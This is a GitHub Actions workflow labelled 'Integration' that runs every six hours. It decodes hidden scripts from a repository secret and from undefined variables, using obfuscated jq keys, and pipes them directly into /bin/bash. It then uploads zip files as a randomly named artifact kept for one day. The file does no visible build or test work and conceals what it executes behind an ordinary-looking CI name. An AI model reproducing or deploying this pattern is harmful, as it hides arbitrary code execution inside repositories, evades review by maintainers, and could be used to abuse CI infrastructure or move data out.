name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '59 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Launch
        env:
          q3: ${{ secrets.q3 }}
        run: |
          printf '%s' "$q3" | jq -r .hp586 | /bin/bash
          printf '%s' "$ccehu0" | jq -r .vxx57653 | /bin/bash
          printf '%s' "$hhs538" | jq -r .zjui88649 | /bin/bash
          printf '%s' "$v26" | jq -r .zrqcr492 | /bin/bash
          echo $ykpv95 | jq -r .zwl2537 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: wWh0XtkU
          path: "*.zip"
          retention-days: 1
